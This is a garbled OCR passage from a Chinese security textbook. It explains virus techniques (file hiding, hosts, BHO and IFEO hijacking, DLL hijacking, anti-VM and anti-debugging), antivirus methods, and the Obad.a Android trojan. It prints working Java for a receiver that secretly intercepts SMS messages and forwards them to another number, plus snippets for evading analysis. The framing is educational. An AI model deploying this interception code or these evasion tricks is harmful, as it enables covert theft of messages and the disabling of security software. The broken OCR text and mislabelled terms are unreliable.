CDROM， 则 为 光驱 。 然 后 将 这 个 函数 放 入 循环 ， 每 隔 一 段 时 间 检 测 全 部 磁盘 就 实现 了 检 
测 U 盘 的 功能 。 

紧 接着 就 是 隐藏 自身 文件 的 功能 ， 代 码 如 下 所 示 。 
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BOOL SetFileAttributes( 
LPCTSTR lpFileName, // 文 件 详细 路 径 
DWORD dwAttributes // 文 件 属性 

); 


文件 路 径 也 就 是 autorun.inf 以 及 病毒 程序 的 具体 路 径 ， 文 件 属 性 则 设置 为 FILE_ 
ATTRIBUTE _ HIDDEN， 那 么 文件 就 被 隐藏 了 。 


934 HB 


本 小 节 讲述 的 是 病毒 的 各 种 劫持 方式 。 
1. 浏览 器 劫持 


(1) hosts 动 持 

hosts〈 见 图 9-84) 文件 路 径 一 般 为 C: \Windows\System32\drivers\vetc， 可 以 用 记事 本 
打开 ， 其 作用 是 加 快 域名 访问 速度 ， 也 就 是 当 用 户 输入 某 网 址 并 访问 时 ， 若 hosts 中 存 有 该 
网 址 与 对 应 JP 则 会 通过 该 IP 解 析 并 访问 该 网 站 。 因 此 ， 病 毒 也 会 通过 修改 对 应 网 站 的 IP， 
将 用 户 输入 的 网 址 支持 至 指定 也 的 网 站 ， 这 是 hosts 支 持 。 


#46. 61. 155. 222 google. com 

#46. 61. 155. 222 www. google. com 

#46. 61. 155. 222 m. google. com 

#46. 61. 155. 222 scholar. google. com 
#46. 61.155. 222 translate. google. com 
#46. 61. 155. 222 books. google. com 
#46. 61. 155. 222 appengine. google. com 
#46. 61. 155. 222 maps. google. com 

#46. 61. 155. 222 news. google. com 

#46. 61. 155. 222 images. google. com 
#46. 61.155. 222 finance. google. com 
#46. 61. 155. 222 history. google. com 
#46. 61. 155. 222 drive. google. com 
#46. 61. 155. 222 docs. google. com 

#46. 61. 155. 222 plus. google. com 

#46. 61. 155. 222 play. google. com 

#46. 61. 155. 222 calendar. google. com 


图 9-84 ”hosts 文 件 
(2) BHO 动 持 
BHO (Browser Helper Object， 浏 览 器 辅助 对 象 》 是 浏览 器 与 程序 员 之 间 开 放 交 互 接 
口 的 业界 标准 。 程 序 员 通过 这 个 接口 可 以 编写 代码 控制 浏览 器 的 行为 ， 别 有 用 心 的 病毒 编 
写 者 则 会 用 此 支持 浏览 器 ， 如 算 改 正 主 页 、 弹 广告 等 。 
BHO 在 注册 表 中 的 位 置 是 HKEY_LOCAL MACHINE SOFTWARE Microsoft Windows! 
CurrentVersion\Explorer\Browser Helper Objects\， 如 图 9-85 所 示 。 其 下 的 项 名 即 为 对 应 的 
BHO。 


— M. = 


EN Ul meses 





J Explorer -|| = zm E 


b J Advanced 8) RU) REG. SZ QES) 
>Ü Appkey 


Ji Associations 
b-i} AutoComplete 
b Ü AutoplayHandlers 
Ji BrowseNewprocess 
4 ы Browser Helper Objects | 
Ji (869F34DD-F0F9-42DC-9EDD-957187DA688D) 


图 9-85 ”BHO 注 册 表 

在 HKEY_LOCAL MACHINE\SOFTWARE\Classes\CLSID\ 下 ， 可 以 找到 BHO 对 应 的 
注册 项 。 其 中 CLSID 属 于 GUID (Globally Unique Identifier) ， 也 称 作 UUID (Universally 
Unique Identifier) ， 它 是 全 局 唯一 标识 符 ， 作 为 COM 类 的 标识 符 。 

其 中 InprocServer32 下 键 值 数 据 所 表示 的 是 BHO 加 载 的 DLL 文件 〈 见 图 9-86) 。 病 毒 则 
会 将 自身 添加 进 BHO 且 加 载 恶 意 DLL 来 劫持 浏览 器 。 

(3) LSP 动 持 

LSP (Label Switched Path， 分 层 服务 提供 程序 ) 全 称 是 Winsock LSP， 它 是 TCP/IP、 
UDP/IP 等 协议 的 接口 。LSP 支 持 则 是 指 支持 其 发 送 消息 的 机 制 ， 比 如 在 TCP 协 议 下 ， 病 毒 
重 写 WSPConnect 函 数 ， 拦 截 IP 并 且 进 行 跳 转 ，UDP 协 议 下 ， 其 重 写 WSPSend 函 数 ， 替 换 
服务 器 主机 名 。 


4-40 (B69F34DD-FOF2-A2DC-9EDD-95718;. | TD рду REG SZ CaProgram Files (x86) V360 360Safelsafemonh... 
138 Ile eid CM gore 到 ThreadingMod- REG SZ Apartment 
Ji InprocServer32. 
Ji ProgID 
Ji Typetib. 
Ji VersionindependentProgID. 
b À (BGAFFBSO-6FA6-4981-8912-C3F7A8: 
> À (B6844A97-B802-4d6e-9846-3AB9CC 
b À (B6C06598-314D-4b63-8C5C-4014F2 
J (86С2928С-7С88-41ЕЕ-8854-8ЕС926 
b À (b6dc98b1-0bec-45e1-b2e4-3a2d94. 











图 9-86 ”加 载 DLL 
2. 映像 /镜像 劫持 


映像 劫持 (mage File Execution Options, IFEO) 是 早期 病毒 对 付 杀毒 软件 的 一 大 
手段 ， 其 实 也 只 是 使 用 完全 权限 ， 在 注册 表 HKEY_LOCAL _MACHINE\SOFTWARE\ 
Microsoft Windows NT\CurrentVersion\Image File Execution Options\ 下 新 建 一 个 Debugger 
项 ， 项 的 名 称 为 劫持 的 软件 名 称 ， 如 cmd.exe。 随 后 将 该 项 的 键 值 改 为 一 个 不 存在 的 文 
件 ， 比 如 asdadasdasdasdexe， 如 图 9-87 所 示 。 





XFO REO SEV BERA МЮ 





C xwsetup. EXE A|| 名 称 类 型 数据 

C Your Image File Na | ав GUO REG SZ GARES) 

К] спа. ехе Eb]pebuzzer REG SZ asdadasdasdasd. exe 
СД IME Compatibility 











9-87 IFEO 
每 当 打 开 cmd.exe 时 ， 系 统 会 先 访问 该 注册 表 下 的 Debugger 键 值 所 指向 的 文件 ， 即 
asdadasdasdasd.exe， 而 该 文件 不 存在 时 cmd.exe 自 然 就 无 法 被 打开 ， 同 理 作 用 于 杀毒 软 
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件 ， 这 就 是 病毒 对 抗 杀毒 软件 的 原理 。 
3. DLL 劫持 


操作 系统 在 加 载 DLL 文件 时 ， 先 会 搜索 程序 所 在 的 目录 ， 若 没有 则 会 搜索 系统 目录 。 
DLL 劫持 正 是 利用 系统 的 这 个 机 制 ， 在 程序 目录 下 创建 一 个 与 系统 DLL 名 称 、 导 出 函数 相 
同 (为 了 维持 程序 正常 运行 ) ， 但 是 内 含 病毒 代码 的 DLL 文件 。 当 应 用 程序 加 载 该 DLL 
时 ， 病 毒 代码 也 就 神 不 知 鬼 不 觉 地 运行 了 。 


935 反 虚 拟 机 技术 


鉴于 许多 安全 人 员 通 过 虚拟 机 搭建 蜜 钠 系 统 作为 分 析 病 毒 的 强 有 力 手 段 ， 病 毒 往往 在 
自身 代码 中 植 入 检测 虚拟 机 的 代码 。 


1. 检测 虚拟 机 的 一 般 手 段 


检测 虚拟 机 的 一 般 手段 主要 是 搜索 相关 VM 虚拟 机 的 字符 串 ， 如 搜索 虚拟 机 服务 进程 
使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 遍历 进程 ， 来 搜索 
虚拟 机 的 相关 进程 。 


HANDLE WINAPI CreateToolhelp32Snapshot ( // 快 照 
DWORD dwFlags, // 快 照 内 容 类 型 
DWORD th32ProcessID // 进 程 ID 


); 


CreateToolhelp32Snapshot 函 数 将 对 用 户 选 择 的 类 型 进行 快照 ， 本 例 就 是 快速 读 取 进 程 
列表 。 参 数 一 dwFlags 有 如 下 选择 。 

> TH32CS INHERIT: 快照 句柄 可 以 被 继承 。 

> TH32CS_SNAPALL: 所 有 的 进程 、 线 程 、 由 th32ProcessID 指 定 的 进程 模块 。 

> TH32CS SNAPHEAPLIST: 由 th32ProcessID 指 定 进 程 中 的 堆 。 

> TH32CS_SNAPMODULE: 由 th32ProcessID 指 定 进程 模块 。 

> TH32CS SNAPMODULE32: 由 th32ProcessID 指 定 64 位 程序 进程 中 的 32 位 进程 模块 。 

> TH32CS_SNAPPROCESS: 系统 全 部 进程 信息 。 

> TH32CS_SNAPTHREAD: 系统 全 部 线程 信息 。 

本 例 选择 TH32CS_SNAPPROCESS， 而 参数 二 则 设置 为 0， 表 示 无 指定 进程 。 


BOOL WINAPI Process32First( // 从 快照 中 检索 进程 信息 
HANDLE hSnapshot, // 由 createToolhelp32Snapshot 函 数 返 还 的 句柄 
LPPROCESSENTRY32 1рре // 指 向 PROCESSENTRY32 结 构 体 的 指针 
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参数 二 指向 了 PROCESSENTRY32 结 构 体 。 


BOOL WINAPI Process32Next( 
HANDLE hsnapshot, 
LPPROCESSENTRY32 lppe 
); 
typedef struct tagPROCESSENTRY32 { 
DWORD dwSize; // 结 构 体 大 小 , 使 用 前 必须 使 用 sizeof (PROCESSENTRY32) 进行 设置 


DWORD cntUsage; // 进 程 引用 计数 , 必须 设置 为 1 
DWORD th32ProcessID; // 进 程 ID 
DWORD th32DefaultHeapID; // 进 程 堆 ID 
DWORD th32ModuleID; // 进 程 模块 ID, 必须 设置 为 0 
DWORD cntThreads; // 线 程 的 数量 
DWORD th32ParentProcessID; // 父 进程 ID, 必须 设置 为 0 
LONG pcPriClassBase; // 进 程 创建 线程 的 优先 级 
DWORD dwFlags; // 预 留 信息 
TCHAR szExeFile[MAX PATH];  ”// 以 null 结 尾 的 字符 串 ,包含 该 进程 的 可 执行 文件 的 文件 名 
DWORD th32MemoryBase; // 可 执行 程序 的 加 载 地 址 
DWORD th32AccessKey; / /控制 进 程 地址 空间 可 见 度 
} PROCESSENTRY32; 

检测 虚拟 机 具体 流程 则 为 : 


PROCESSENTRY32 pe32; 

pe32.dwSize = sizeof(pe32);  // 使 用 结构 体 保存 进程 信息 

HANDLE hProcessSnap =CreateToolhelp32Snapshot (TH32CS SNAPPROCESS, 0); 
// 创 建 快照 


随后 建立 循环 ， 在 使 用 Process32First(hProcessSnap.&pe32)，Process32Next(hProcessSn 
ap,&pe32) 中 间 查 找 虚拟 机 进程 ， 如 使 用 strcmp(pe32.szExeFile,"VMwareUserexe" ) 语 句 。 


2. 通过 内 存 来 检测 虚拟 机 


虚拟 机 为 避免 与 物理 主机 冲突 ， 它 在 内 存 映 射 方面 与 物理 主机 存在 差异 ， 因 此 可 以 通 
过 检测 内 存 的 方式 来 检测 虚拟 机 ， 如 检测 IDT CInterrupt Descriptor Table， 中 断 描述 符 表 ) 
的 地 址 ， 其 中 VMware 虚拟 机 中 IDT 地 址 为 0xFFxxxxxx， 而 物理 主机 中 IDT 地 址 不 会 高 于 
0xD0xxxxxx， 因 此 可 以 通过 执行 SIDT 指 令 检测 IDTR (Interrupt Descripter Table Register, 
中 断 描 述 符 表 寄 存 器 ) ，IDTR 用 于 存放 IDT 地 址 ， 然 后 判断 返回 LowIDTbase 的 第 一 个 字 
节 是 否 高 于 0XD0， 以 此 来 检测 虚拟 机 环境 。 
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typedef struct( 
WORD IDTLimit; //IDT 的 大 小 
WORD LowIDTbase; ”//IDT 的 低位 地 址 
WORD HiIDTbase; //IDT 的 高 位 地 址 
) IDTR; 


同 理 可 以 检测 LDT (Local Descriptor Table， 本 地 描述 符 表 ) 与 GDT (Global 
Descriptor Table， 全 局 描述 符 表 ) ， 当 LDT 位 于 0x0000 时 ， 为 物理 主机 ; 当 GDT 位 于 
0xFFxxxxxx 时 ， 为 虚拟 主机 。 


3. 其 他 方法 


另外 ， 还 可 以 通过 搜索 “VMware” 字 符 串 来 检测 虚拟 机 的 注册 表 项 ， 进 而 检测 虚拟 
机 是 否 存 在 。 此 外 也 可 以 从 物理 硬件 层面 进行 检测 ， 如 检测 网 卡 的 MAC 地 址 、BIOS 等 。 


936 ” 反 调 试 技术 

病毒 侦 测 虚拟 机 的 同时 ， 也 存在 被 调试 器 分 析 的 风险 ， 因 此 病毒 会 在 自身 代码 中 实现 
反 调试 技术 ， 常 见 的 反 调试 技术 有 以 下 几 种 。 

1. 查询 PEB 


BOOL IsDebuggerPresent (void) 
// 若 程序 处 于 调试 环境 ， 则 返回 TRUE， 否则 返回 FARLSE 
BOOL CheckRemoteDebuggerPresent ( 














HANDLE hProcess, // 进 程 句柄 ， 由 GetCurrentProcess 返 回 得 到 
PBOOL pbDebuggerPresent // 用 来 接收 返还 结果 的 布尔 值 参数 
ins // 调 试 环境 下 返回 TRUE， 非 调试 环境 下 返回 FARLSE 


使 用 之 前 介绍 过 的 NtQueryInformationProcess 函 数 ， 并 且 将 其 参数 二 设置 为 
ProcessDebugPort (0x7)， 返 回 0 表明 程序 没有 被 调试 ， 调 试 状态 下 将 返回 调试 的 端口 号 。 

以 上 三 个 函数 均 采 用 了 检测 PEB 结 构 中 的 BeingDebugged 参 数 信息 ， 同 样 也 可 以 通过 
汇编 代码 获取 该 信息 。 


int dbg; // 声 明 整 形变 量 接 受 BeingDebugged 的 值 
 asm( //32 位 系统 环境 

mov eax,fs: [30h] // 定 位 PEB 

mov eax,[eax + 2h] // 定 位 BeingDebugged 

mov dbg,eax // 接 收 BeingDebugged 的 值 


} 
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最 后 检测 dbg 的 值 ， 若 dbg 的 值 为 0， 则 表明 非 调 试 环境 。 同 样 在 PEB 结 构 中 被 改变 的 
还 有 一 些 Heap (HE) 标志 ， 如 ProcessHeap、NTGlobalFlag。 


2. 扫描 进程 


程序 可 以 使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 持续 
对 进程 进行 扫描 ， 查 找 如 “ida.exe”“OllyDbg.exe” 之 类 的 调试 软件 ， 也 可 以 直接 使 用 
FindWindow 函 数 进行 窗口 查找 。 


HWND FindWindow( 
LPCTSTR lpclassName，// 窗 口 的 类 
LPCTSTR lpWindowName // 窗 口 的 名 称 
); 


参数 一 可 以 为 NULL， 参 数 二 中 只 要 包含 调试 程序 名 称 的 部 分 字符 串 即 可 ， 如 
FindWindow(NULL, "ollydbg "); 即 可 。 


3. 时 间 间 隔 检测 
这 里 介绍 RDTSC 指 令 。 


RDTSC 指 令 返 回 的 是 自 开 机 以 来 的 CPU 的 周期 数 ， 返 回 的 是 一 个 64 位 的 值 
EDXL:EAX 〈 高 32 位 在 EDX， 低 32 位 在 EAX) ， 那 么 使 用 方法 是 如 下 。 


int time first, time last, time sub 
.asm( 
rdtsc 


mov time first, eax 


CN // 部 分 程序 代码 


mov time_last, eax 


} 


time sub = time last - time first 
通过 比较 time_sub 的 差 值 是 否 大 于 正常 运行 时 间 ， 从 而 判断 程序 是 否 位 于 调试 环境 ， 
与 之 相似 的 函数 有 : 


DWORD GetTickCount ( void) 
返回 自 计 算 机 启动 到 调用 该 函数 的 时 间 差 ， 以 毫秒 为 单位 。 可 以 使 用 类 似 上 文 的 方 
法 ， 计 算 时 间 差 ， 判 断 调 试 环 境 。 
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4. 加 壳 


加 壳 是 运用 加 密 算 法 将 程序 压缩 ， 修 改 程序 入 口 点 (Original Entry Point, OEP) ， 加 密 程 
序 源码 ， 在 内 存 中 加 载 时 进行 解码 ， 从 而 阻止 调试 软件 对 程序 代码 在 用 户 层面 的 修改 。 


5. 加 花 


加 “ 花 ” 是 指 加 入 花 指 令 ， 花 指令 由 一 些 汇编 语言 组 成 的 干扰 调试 人 员 进 行 分 析 的 代 
码 ， 程 序 能 够 正常 运行 ， 但 会 造成 反 汇编 出 错 。 
从 源码 上 学 习 完 以 上 小 节 之 后 ， 再 次 请 问 什么 是 计算 机 病毒 ? 


94 反 病 毒 技术 介绍 





941 特征 码 ( f& ) 扫描 


首先 我 们 介绍 杀毒 软件 最 传统 的 杀毒 方法 一 一 特征 码 扫 描 。 特 征 码 是 由 反 病 毒 分 析 人 
员 从 病毒 样本 的 中 不 同位 置 提取 的 一 系列 字 节 ， 也 就 是 带 有 病毒 特征 的 一 系列 代码 。 随 后 
这 些 代码 经 过 严格 的 实验 及 比 对 ， 最 终 将 符合 条 件 的 特征 码 整 合 在 一 起 ， 病 毒 库 ( 又 名 特 
征 码 库 ) 由 此 诞生 。 

特征 码 扫描 则 是 使 用 自身 引擎 反 编译 文件 代码 ， 并 且 代码 内 搜索 匹配 是 否 含有 病毒 库 
中 的 特征 码 和 特征 码 偏 移 的 位 置 ， 进 而 判断 文件 是 否 为 病毒 文件 。 在 病毒 与 杀毒 软件 的 斗 
争 中 ， 病 毒 库 显然 无 法 及 时 更 新 跟 上 病毒 的 开发 步伐 ， 同 时 也 会 因为 病毒 加 这、 加 花 免 杀 
从 而 难以 扫描 出 符合 的 特征 码 ， 虽 然 其 后 增加 了 复杂 特征 码 扫描 以 及 隐藏 特征 码 扫 描 ， 但 
特征 码 扫 描 始 终 无 法 做 到 “ 快 毒 一 步 ”， 因 此 启发 式 扫 描 作 为 弥补 特征 码 扫描 的 缺陷 而 被 
开发 出 来 。 


942 启发 式 扫描 


启发 式 扫描 分 为 静态 启发 式 扫描 与 动态 启发 式 扫 描 。 静 态 启发 式 扫描 以 特征 码 扫描 为 
基础 ， 通 过 反 汇 编 在 不 运行 的 条 件 下 对 目标 文件 进行 特征 指令 扫描 ， 如 果 其 使 用 的 指令 组 
合 与 原先 由 专家 经 验 分 析 得 出 的 病毒 指令 〈 通 常 是 带 有 病毒 性 质 的 API 函 数 的 组 合 ) 相似 
度 高 ， 就 会 被 判断 为 病毒 程序 。 动 态 启发 式 扫描 则 是 结合 杀毒 软件 内 置 的 虚拟 机 技术 〈 软 
件 模拟 CPU 等 仿真 环境 ) ， 将 病毒 动态 运行 在 虚拟 机 中 并 检测 其 行为 ， 若 发 现 类 似 病毒 的 
可 疑 行为 ， 则 判定 为 病毒 程序 。 

启发 式 扫描 在 未 知 病毒 的 检测 方面 起 到 了 关键 性 的 作用 ， 弥 补 了 特征 码 扫 描 无 法 第 一 
时 间 检 测 最 新 病毒 的 缺陷 ， 当 然 启发 式 扫 描 存 在 误 报 的 情况 ， 但 很 明显 是 利 大 于 次 了 。 


— B] — 





9.4.3 主动 防御 技术 


为 了 起 到 实时 、 主 动 防护 病毒 入 侵 的 作用 ， 主 动 防御 技术 打破 了 传统 杀毒 软件 检测 
特征 码 的 思路 。 首 先 它 在 驱动 内 核 层 次 加 载 自 身 ， 从 而 避免 自身 进程 在 用 户 层面 被 病毒 终 
结 ;， 其 次 ， 就 像 之 前 介绍 的 键盘 钩子 HOOK， 主 动 防御 技术 在 操作 系统 中 HOOK 了 一 些 病 
毒 常用 的 AI 函数， 每 当 有 程序 使 用 这 些 API 函 数 的 时 候 ， 它 会 根据 程序 使 用 的 API 函 数 以 
及 伴随 这 些 API 函 数 做 出 的 行为 推测 该 程序 是 否 为 病毒 ， 进 而 做 到 实时 监控 。 

主动 防御 技术 避免 了 在 用 户 在 不 知情 的 情况 下 运行 病毒 ， 并 且 对 未 知 病毒 也 起 到 了 一 
定 的 防范 作用 。 同 时 ， 如 360 安 全 卫士 等 杀毒 软件 在 主动 防御 技术 中 也 增添 了 漏洞 实时 修 
补 功能 ， 杜 绝 了 病毒 通过 漏洞 入 侵 计 算 机 。 
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由 于 传统 杀毒 方法 的 病毒 库 巨大 以 及 杀毒 内 存 开销 大 等 缺点 ， 云 查 杀 将 成 为 未 来 杀毒 
软件 的 主流 趋势 。 云 查 杀 将 特征 码 库存 于 服务 器 端 ， 在 查 杀 时 通过 安全 公司 的 “ 云 计 算 ” 
手段 ， 实 现 了 在 短 时 间 内 迅速 查 杀 以 及 云端 病毒 库 快速 更 新 ， 但 其 缺点 是 需要 保证 一 个 畅 
通 无 阻 的 网 络 环境 ， 并 且 有 隐私 泄露 的 危险 。 


9.5 Android 木 马 


随 着 智能 手机 的 普及 ， 移 动 互 联网 已 然 成 为 了 生 
活 中 不 可 缺少 的 一 部 分 。 在 巨大 利益 的 驱使 下 ， 手 机 病 
毒 的 黑色 产业 链 便 慢 慢 出 现 了 。 手 机 病毒 的 目的 非常 f 
单 ， 即 是 通过 获取 用 户 隐私 来 牟利 。 

大 多 数 手机 病毒 都 有 共同 的 特性 : 窃取 用 户 信息 并 
悄悄 向 增值 服务 号 码 发 送 短信 ， 自 启动 以 及 高 隐蔽 性 。 

前 两 年 出 现 了 一 种 被 称 为 “Backdoor.AndroidOS. 
Obad.a” 的 极 具 代表 性 的 Android 木 马 ， 如 图 9-88 所 示 。 
该 木马 利用 了 当时 “Android 操 作 系 统 此 前 位 置 的 漏洞 来 
提升 程序 的 权限 ， 并 且 能 够 阻止 被 卸载 ”。 到 底 为 什么 modi ias 





a, 
com.android.system.ad.. 
vant to install this application? 
is application to: 


Your messages 


* Network communication 


Your personal information 





这 个 木马 如 此 强大 呢 ， 于 是 手机 安全 专家 们 就 对 其 展开 
了 深度 剖析 。 

OD 这 款 木马 的 代码 隐蔽 性 非常 高 ， 代 码 也 比 普 通 
木马 的 代码 复杂 烦琐 得 多 。 显 然 ， 复 杂 的 代码 并 不 是 这 
款 木马 唯一 神奇 的 地 方 。 

(2) Odab.a 的 AndroidManifest.xml 文 件 也 非常 精 
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Phone calls 
Services that cost you money 


System tools 





Cancel Install 


图 9-88 ”安装 界面 
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妙 ， 木 马 作 者 在 对 Android 的 漏洞 挖掘 及 利用 之 后 ， 使 用 了 非 谷歌 标 准 的 AndroidManifest. 
xml 文 件 ( 见 图 9-89》， 并 使 其 能 够 正常 被 智能 手机 运行 。 


cation =".COcCcc1"> 
<activity ="System" =".ССО1о11"> 
<intent-filter> 
<action android:namee"android.intent.action.MAIN" /> 


<receiver ="System" =".0С11С00" ="android.permission.BIND_DEVICE_ADMIN"> 
«mota-data ="android.app.device admin" ="@xml/ccclocc" /> 
<intent-filter> 
«action androidiname="com.strain.admin.DEVICE ADMIN ENABLED" /> 


图 9-89 AndroidManifest.xml 文 件 
(3) 该 木马 通过 对 指令 代码 进行 特殊 处 理 ， 从 而 阻止 反 编译 。 该 木马 除了 对 代码 进 
行 加 密 处 理 以 外 ， 还 通过 对 指令 代码 进行 特殊 处 理 ， 使 得 安全 公司 常用 的 Java 反 编译 工具 
见 图 9-90) 无 法 正确 地 反 编 译 其 指令 ， 增 加 了 对 木马 的 分 析 难度 。 
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OB internal.telephony 5 
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if Corray0f(8yte1 == null) 

» (0 OColCCo a 
» Dadoco for (int n = paranJnt2; ; n = array0fBytel[paronInt2]》 
» [jj сюсас t 
» [cooon к. 5 

= -4 o (m o n); 
d pecus ora0fytez0 = «буо; 
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» D соссою return new String(orroy0fByte2, 0); 
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» Í саю M ERROR MA 
> @касыс тне final void nO 
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图 9-90 ”Java 反 编译 工具 


(4) 此 木马 无 法 被 删除 。Android 系 统 从 2.2 版 本 开始 ， 提 供 了 一 个 “设备 管理 器 ”的 
功能 ， 其 初衷 是 为 企业 部 署 远程 IT 控制 使 用 ， 为 了 防止 员工 私自 卸载 企业 安装 的 “设备 管 
理 器 ”， 一 旦 激活 设备 管理 器 之 后 ， 该 设备 管理 器 就 不 可 删除 〈 见 图 9-91) 。 但 是 ， 由 于 


i == 


0 Nm 


Android 系 统 对 此 功能 设计 得 不 完善 ， 使 得 木马 可 以 利用 这 个 机 制 ， 让 自己 注册 成 为 一 个 
设备 管理 器 ， 从 而 阻止 用 户 卸 载 。 

(5) 一 旦 用 户 不 慎 “ 激 活 ” 木 马 ， 它 就 被 注册 成 了 设备 管理 器 ， 此 时 该 木马 的 “ 强 
行 停止 ”和 “外 载 ” 按 钮 将 完全 失效 ， 即 木马 无 法 关闭 且 无 法 卸载 。 另 外 由 于 设备 管理 器 
的 权限 以 及 木马 自身 使 用 非 标 准 的 手段 来 注册 设备 管理 器 ， 所 以 即使 Android 让 它 注册 成 
功 了 ， 它 也 不 会 在 设备 管理 器 列表 中 显示 ， 用 户 因此 找 不 到 取消 注册 设备 管理 器 的 入 口 ， 
便 无 法 取消 此 木马 的 权限 ， 如 图 9-92 所 示 。 
































网 o & 6:4 


BESTEEL EEE 


т 
INEI System 


没有 可 供 显 示 的 设备 管理 器 





图 9-91 激活 界面 89-92 ”木马 注册 后 ， 设 备 管理 器 显示 “没有 可 供 


显示 的 设备 管理 器 ” 


通过 以 上 分 析 发 现 ， 如 果 用 户 在 最 开始 不 给 予 木马 权限 的 话 ， 那 么 它 就 不 会 造成 很 大 
的 危害 ， 所 以 ， 良 好 的 手机 使 用 习惯 是 自己 不 “中 招 ” 的 最 重要 的 环节 ， 建 议 : 


> 
> 
> 


> 


F 


不 要 随便 安装 来 源 不 可 靠 的 软件 ; 

不 要 随便 给 予 不 可 靠 软件 设备 权限 ; 

习惯 性 地 检查 手机 文件 ， 看 看 有 没有 可 疑 文件 ; 

安装 软件 之 前 ,仔细 查 看 该 软件 需要 哪些 权限 并 且 是 否 确实 需要 这 
行 APP 完 整 功 能 。 
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面 ， 附 上 安 卓 短信 发 送 代码 : 











package com.android.service; 


import java.text.SimpleDateFormat; 
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import android.annotation.SuppressLint; 
import android.content.BroadcastReceiver; 
import android.content.Context; 

import android.content.Intent; 

import android.os.Bundle; 

import android.telephony.SmsManager; 


import android.telephony.SmsMessage; 


public class a extends BroadcastReceiver { 
public static final String SMS RECEIVED ACTION = 


"android.provider.Telephony.SMS RECEIVED"; 


GSuppressLint ("SimpleDateFormat") 
GOverride 
public void onReceive(Context context, Intent intent) ( 
Bundle bundle - intent.getExtras(); 
Object[] objects = (Object[]) bundle.get ("pdus"); 
for (Object obj : objects) ( 
// 注 册 smsMessage 
SmsMessage smsMessage-SmsMessage.createFromPdu((byte[]) obj); 
String body = smsMessage.getDisplayMessageBody(); 
String addres = smsMessage.getDisplayOriginatingAddress(); 
long date = smsMessage.getTimestampMillis(); 
// 格 式 化 时 间 
SimpleDateFormat format = new SimpleDateFormat ( 
"yyyy-MM-dd hh:mm:ss"); 
String dateStr = format.format (date); 
System.out.println(addres + ":" + dateStr + ":" + body); 
// 拦 截 指 定 号 码 短信 
if (addres.equals("5554")) { 
abortBroadcast(); 
SmsManager smsManager = SmsManager.getDefault(); 
// 回 传 短信 到 指定 号 码 
smsManager.sendTextMessage("5556", null, addres + ":" 


+ dateStr + ":" + body, null, null); 
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} 


} 


安 卓 的 短信 都 是 按 广播 的 形式 处 理 ， 所 以 只 需要 对 广播 进行 监听 就 可 以 ， 当 BroadcastReceiver 
优先 级 大 于 其 他 的 BroadcastReceiver 的 优先 级 的 时 候 ， 便 可 以 使 用 abortBroadcast0 来 将 此 
广播 拦截 ， 使 其 他 APP 无 法 接收 到 此 广播 。 


<!-- 注册 receive 并 设置 优先 级 --> 
<receiver android:name="com.android.service.a" android:exported="false"> 
<intent-filter android:priority="10000"> 
«action android:name="android.provider.Telephony.SMS_ 
RECEIVED"/» 
«/intent-filter» 


«/receiver» 


9.6 Жл: 


本 章 首先 介绍 了 计算 机 病毒 的 起 源 以 及 发 展 过 程 ， 帮 助 读 者 了 解 了 什么 是 计算 机 病 
毒 。 然 后 通过 行为 分 析 手 段 来 讲解 各 种 病毒 分 析 工具 的 使 用 方法 ， 从 而 使 读者 更 加 透彻 地 
了 解 计算 机 病毒 的 行为 ， 再 从 代码 层面 揭 开 计算 机 病毒 神秘 的 面纱 。 接 下 来 介绍 了 计算 机 
病毒 的 其 他 常用 技术 手段 、 反 分 析 手 段 和 杀毒 软件 技术 原理 ， 从 其 他 方面 揭示 计算 机 病毒 
的 本 质 其 实 就 是 一 些 API 函 数 的 连 招 组 合 。 最 后 分 析 了 一 个 安 卓 病毒 实例 ， 随 着 移动 手机 
的 普及 ， 手 机 病毒 也 成 为 未 来 病毒 发 展 的 重要 趋势 ， 加 上 大 多 数 人 对 移动 设备 病毒 的 防御 
意识 薄弱 ， 更 让 恶意 黑客 有 机 可 乘 。 要 防御 病毒 的 攻击 ， 就 要 求 储备 更 多 的 安全 知识 。 通 
过 本 章 的 学 习 ， 读 者 会 发 现 病毒 其 实 并 不 神秘 ， 只 要 我 们 怀 着 一 份 探索 未 知 〈 不 仅仅 是 计 
算 机 安全 ) 的 热忱 ， 一 份 对 于 知识 的 强烈 渴求 ， 通 过 不 断 钻研 ， 定 能 有 所 突破 。 
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SN 黑客 与 安全 技术 指南 


安全 领域 的 知识 博大 精深 ， 几 乎 没有 人 能 掌握 全 部 的 知识 技能 ， 想 要 学 习 更 多 的 知 
识 ， 就 一 定 不 能 局 限于 某 一 领域 。 本 章 将 讲解 一 项 在 安全 领域 比较 前 沿 的 竞赛 一 一 CTF。 


10.1 СТЕЙ 


СТЕ (Capture The Flag) 一 般 译作 夺 旗 赛 ， 它 作为 信息 安全 领域 选拔 人 才 和 互相 比拼 
技能 水 平 的 比赛 ， 夺 旗 赛 被 越 来 越 多 的 人 所 关注 。 这 种 比赛 形式 起 源 于 1996 年 的 DEFCON 
全 球 黑客 大 会 ， 这 次 大 会 上 用 虚拟 夺 旗 竞赛 的 形式 代替 之 前 黑客 之 间 的 真实 攻击 。CTF 
现在 已 经 成 为 全 球 范围 网 络 安全 圈 流 行 的 竞赛 形式 。DEFCON 作 为 CTF 赛 制 的 发 源 地 ， 
DEFCON CTF 也 成 为 了 代表 目前 全 球 最 高 技术 水 平和 影响 力 的 CTF 竞 赛 。 


10.1.1 CTF 的 三 种 竞赛 模式 


CTF 竞 赛 模式 分 为 以 下 三 类 。 
1. 解 题 模式 ( Jeopardy ) 


参赛 队伍 可 以 通过 互联 网 或 者 现场 的 网 络 参与 ， 这 种 模式 的 CTF 竞 赛 与 ACM 编 程 竞 
赛 、 信 息 学 奥赛 比较 类 似 ， 以 解决 网 络 安全 技术 挑战 题目 的 分 值 和 时 间 来 排名 ， 通 常用 于 
在 线 选拔 赛 。 题 目 主要 包含 逆向 、 漏 洞 挖掘 与 利用 、Web 渗 透 、 密 码 、 取 证 、 隐 写 、 安 全 
编程 等 ， 这 也 是 新 手 最 早 也 是 最 容易 接触 到 的 CTF 竞 赛 模式 。 


2. 攻防 模式 ( Attack-Defense ) 


在 攻防 模式 CTF 赛 制 中 ， 参 赛 队 伍 在 网 络 空间 互相 进行 攻击 和 防守 ， 挖 掘 网 络 服务 漏 
洞 并 攻击 对 手 服务 来 得 分 ， 通 过 修补 自身 服务 漏洞 进行 防御 来 避免 于 分， 这 多 数 出 现在 线 
